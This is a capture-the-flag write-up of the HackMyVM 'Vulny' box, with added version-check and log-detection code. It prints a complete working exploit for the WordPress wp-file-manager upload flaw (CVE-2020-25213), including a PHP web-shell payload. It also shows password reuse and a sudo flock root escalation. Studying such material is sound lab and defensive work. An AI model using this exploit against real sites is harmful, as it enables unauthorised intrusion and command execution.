Here I will make a writeup of the Vulny machine on the HackMyVm platform. It is an easy-rated VM; if you are interested, you can click the link here. Let's start.
As always, the first thing I do is port scanning, and at this point nmap finds only one open TCP port, HTTP (80):
$ nmap -sC -sV -sT 192.168.1.38
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-09 03:13 EST
Nmap scan report for 192.168.1.38
Host is up (0.0014s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds
The site only serves the Apache default page, so we need to look for hidden paths or files with a directory brute-forcing tool such as dirb or dirsearch.
$ dirsearch -u http://192.168.1.38/ --exclude-status 403,401
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Target: http://192.168.1.38/
[04:12:21] Starting:
[04:12:49] 200 - 11KB - /index.html
[04:12:51] 301 - 317B - /javascript -> http://192.168.1.38/javascript/
[04:13:10] 301 - 313B - /secret -> http://192.168.1.38/secret/
Task Completed
Here we find two directories, /javascript and /secret. Requesting /javascript returns 403 Forbidden (dirsearch only listed its 301 redirect because 403 responses were excluded), but /secret is browsable and contains a note.
The note tells us that a WordPress configuration file holds a username and password. This is odd at first, because Wappalyzer or wpscan run against http://192.168.1.38/ show no sign of WordPress. The reason is simply that only the Apache default page lives at the web root; the WordPress install is somewhere below it.
Next, we brute-force directories again with dirsearch, this time under /secret.
$ dirsearch -u http://192.168.1.38/secret/ --exclude-status 403,401
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Target: http://192.168.1.38/secret/
[04:32:45] Starting:
[04:33:29] 200 - 7KB - /secret/readme.html
[04:33:42] 301 - 322B - /secret/wp-admin -> http://192.168.1.38/secret/wp-admin/
[04:33:42] 301 - 324B - /secret/wp-content -> http://192.168.1.38/secret/wp-content/
[04:33:42] 500 - 610B - /secret/wp-content/plugins/akismet/akismet.php
[04:33:42] 500 - 610B - /secret/wp-content/plugins/akismet/admin.php
[04:33:42] 200 - 2KB - /secret/wp-content/
[04:33:42] 200 - 1003B - /secret/wp-content/upgrade/
[04:33:42] 200 - 1KB - /secret/wp-content/uploads/
[04:33:42] 301 - 325B - /secret/wp-includes -> http://192.168.1.38/secret/wp-includes/
[04:33:43] 500 - 3KB - /secret/wp-admin/setup-config.php
[04:33:43] 500 - 0B - /secret/wp-includes/rss-functions.php
Task Completed
From these results, three paths were found:
/wp-admin = responds the same way as /secret
/wp-content = 200 (directory listing is enabled)
/wp-includes = Forbidden
Next, we focus on /wp-content. Inside it is the /uploads directory, and browsing it shows that this site uses the wp-file-manager plugin.
Accessing http://192.168.1.38/secret/wp-content/uploads/2020/10/ reveals the wp-file-manager version, 6.0, and this version is vulnerable: CVE-2020-25213, an unauthenticated arbitrary file upload through the plugin's bundled elFinder connector (lib/php/connector.minimal.php), which was fixed in 6.9.
We download the public exploit for CVE-2020-25213 and make one small change: WordPress is installed under /secret, so that prefix is added to the two plugin URLs.
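Before firing an exploit it is worth confirming the two preconditions in a repeatable way: the plugin version predates the 6.9 fix, and the connector file is reachable without authentication. The following is an added example, not the writeup's or the exploit author's code. The readme.txt and plugin header snippets are constructed samples (not captured from Vulny), and the "affected below 6.9" boundary is the CVE-2020-25213 fix version; the URL builder takes the WordPress sub-path as a parameter so it handles installs like /secret.

```python
import re

# CVE-2020-25213: wp-file-manager before 6.9 ships a live elFinder connector
# (lib/php/connector.minimal.php) that accepts uploads without authentication.
FIXED_VERSION = (6, 9)
PLUGIN_DIR = "/wp-content/plugins/wp-file-manager/"

# Constructed sample of a wp-file-manager readme.txt header (not from the target).
SAMPLE_README = """=== File Manager ===
Contributors: mndpsingh287
Tags: file manager, wp file manager
Requires at least: 4.0
Tested up to: 5.5
Stable tag: 6.0
"""

# Constructed sample of a plugin main-file header (not from the target).
SAMPLE_PLUGIN_HEADER = """<?php
/*
Plugin Name: File Manager
Version: 6.4
*/
"""


def parse_version(text):
    """Extract the version tuple from a 'Stable tag:' (readme.txt) or
    'Version:' (plugin header) line; None when neither is present."""
    m = re.search(r"^\s*(?:Stable tag|Version):\s*([0-9]+(?:\.[0-9]+)*)\s*$",
                  text, re.M | re.I)
    if not m:
        return None
    return tuple(int(p) for p in m.group(1).split("."))


def is_affected(version):
    """True when the version predates the 6.9 fix. Tuple comparison keeps
    6.10 > 6.9 correct, which a string comparison would get wrong."""
    return version is not None and version < FIXED_VERSION


def probe_urls(base_url, wp_path="/"):
    """Build the URLs to fetch: readme.txt for the version, and the connector,
    whose presence (anything but 404) is the exposure indicator. wp_path is the
    directory WordPress lives in, e.g. '/secret' on this box."""
    root = (base_url.rstrip("/") + "/" + wp_path.strip("/")).rstrip("/")
    plugin = root + PLUGIN_DIR
    return {
        "readme": plugin + "readme.txt",
        "connector": plugin + "lib/php/connector.minimal.php",
    }


def assess(version, connector_status):
    """Combine both checks into a verdict. connector_status is the HTTP status
    returned for an unauthenticated GET of the connector URL."""
    if not is_affected(version):
        return "not affected (version >= 6.9)"
    if connector_status == 404:
        return "version affected but connector not reachable"
    return "exploitable: affected version and connector reachable"


if __name__ == "__main__":
    urls = probe_urls("http://192.168.1.38", "/secret")
    v = parse_version(SAMPLE_README)
    print(urls["connector"])
    print(v, assess(v, 200))
```

Run this against a real target by fetching the two URLs with your HTTP client of choice and passing the readme body and the connector's status code into parse_version and assess; the module itself never touches the network.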
#!/usr/bin/env python3
# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]
# Changed for Vulny: WordPress lives under /secret, so that prefix is added to both plugin paths.
import sys, signal, requests
from bs4 import BeautifulSoup
#from pprint import pprint

def handler(sig, frame):
    print("[!] Exiting")
    sys.exit(1)

signal.signal(signal.SIGINT, handler)

def commandexec(command):
    # The connector stores uploads in lib/files/ (elFinder volume root "l1_Lw");
    # the "../" in the URL is resolved by the web server.
    exec_url = url + "/secret/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
    params = {
        "cmd": command
    }
    r = requests.get(exec_url, params=params)
    # Strip the <pre> wrapper the web shell puts around the command output.
    soup = BeautifulSoup(r.text, 'html.parser')
    text = soup.get_text()
    print(text)

def exploit():
    global url
    url = sys.argv[1].rstrip("/")
    command = sys.argv[2]
    # connector.minimal.php is the unauthenticated elFinder connector (CVE-2020-25213).
    upload_url = url + "/secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
    headers = {
        'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
        'Connection': "close"
    }
    # Hand-built multipart body: cmd=upload, target=l1_Lw (volume root), upload[]=shell.php
    payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"
    try:
        r = requests.post(upload_url, data=payload, headers=headers)
        #pprint(r.json())
        commandexec(command)
    except Exception as e:
        print("[!] Something went wrong...", e)

def help():
    print("\n[*] Usage: python3", sys.argv[0], "\"url\" \"command\"")
    print("[!] Example: python3", sys.argv[0], "http://wordpress.local/ id")

if __name__ == '__main__':
    if len(sys.argv) != 3:
        help()
    else:
        exploit()
Then run the script with the target URL and a command, as shown in its usage text.
This gives us command execution through the uploaded shell.php; next we use it to launch a reverse shell.
With the reverse shell in hand, we check the WordPress configuration file (wp-config.php) for the username/password the note in /secret hinted at.
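From the defender's side, the exploit above leaves a recognisable two-step trace in the Apache access log: a POST to connector.minimal.php, then PHP executed from the plugin's lib/files/ upload volume, possibly via a lib/php/../files/ traversal. The detector below is an added example written for this writeup, not code from the page or the exploit; the log lines are constructed samples in Apache combined format, and the client IPs and timestamps in them are made up.

```python
import posixpath
import re
from urllib.parse import urlsplit

# Apache combined log format:
# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

CONNECTOR = "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
UPLOAD_DIR = "/wp-content/plugins/wp-file-manager/lib/files/"

# Constructed sample log (not a real capture): one exploit chain from .10,
# one benign admin login and one connector probe from .20.
SAMPLE_LOG = """\
192.168.1.10 - - [09/Nov/2023:04:40:01 -0500] "POST /secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 612 "-" "python-requests/2.31.0"
192.168.1.10 - - [09/Nov/2023:04:40:01 -0500] "GET /secret/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=id HTTP/1.1" 200 87 "-" "python-requests/2.31.0"
192.168.1.10 - - [09/Nov/2023:04:41:15 -0500] "GET /secret/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php?cmd=whoami HTTP/1.1" 200 87 "-" "python-requests/2.31.0"
192.168.1.20 - - [09/Nov/2023:04:42:00 -0500] "GET /secret/wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.20 - - [09/Nov/2023:04:42:30 -0500] "GET /secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=open&init=1 HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Drop the query string and collapse "../" so lib/php/../files/x.php and
    # lib/files/x.php are recognised as the same resource.
    rec["path"] = posixpath.normpath(urlsplit(rec["target"]).path)
    return rec


def classify(rec):
    """Tag one request, or return None when it is uninteresting."""
    path = rec["path"]
    if path.endswith(CONNECTOR):
        # Any reachable connector is the CVE-2020-25213 precondition; a
        # successful POST is the upload primitive itself.
        if rec["method"] == "POST" and 200 <= rec["status"] < 300:
            return "connector_upload"
        return "connector_access"
    if UPLOAD_DIR in path and path.endswith(".php"):
        # Executing PHP out of the elFinder upload volume is never legitimate.
        return "webshell_exec"
    return None


def analyze(lines):
    """Return the list of findings (ip, ts, tag, normalised path, raw target)."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tag = classify(rec)
        if tag:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "tag": tag,
                             "path": rec["path"], "target": rec["target"]})
    return findings


def exploit_chains(findings):
    """Source IPs that made a successful connector POST and afterwards executed
    PHP from lib/files/: the full CVE-2020-25213 chain rather than a lone probe."""
    uploaded, chained = set(), set()
    for f in findings:  # findings are in log order
        if f["tag"] == "connector_upload":
            uploaded.add(f["ip"])
        elif f["tag"] == "webshell_exec" and f["ip"] in uploaded:
            chained.add(f["ip"])
    return sorted(chained)


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG.splitlines())
    for f in found:
        print(f["ip"], f["ts"], f["tag"], f["path"])
    print("exploit chains from:", exploit_chains(found))
```

The normalisation step matters: Apache's %r logs the request line as the client sent it, so a naive substring match on lib/files/ misses the lib/php/../files/ form the exploit actually uses. A lone connector_access hit is still worth an alert on a patched install, because 6.9 and later do not ship a reachable connector at all.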
The password found there is idrinksomewater.
Checking /etc/passwd shows a user adrian (Ari Adrian), so we assume this password is reused for that account.
Log in as adrian with the password obtained earlier; the login succeeds.
Next, check whether the user has any sudo rights: sudo -l lists the commands the user may run with sudo.
The list includes the flock binary, which can be used for privilege escalation: flock runs an arbitrary command while holding a lock on a file, so run as root through sudo it will happily spawn a shell (the standard GTFOBins technique is sudo flock -u / /bin/sh).
And root was successfully obtained. Vulny pwned!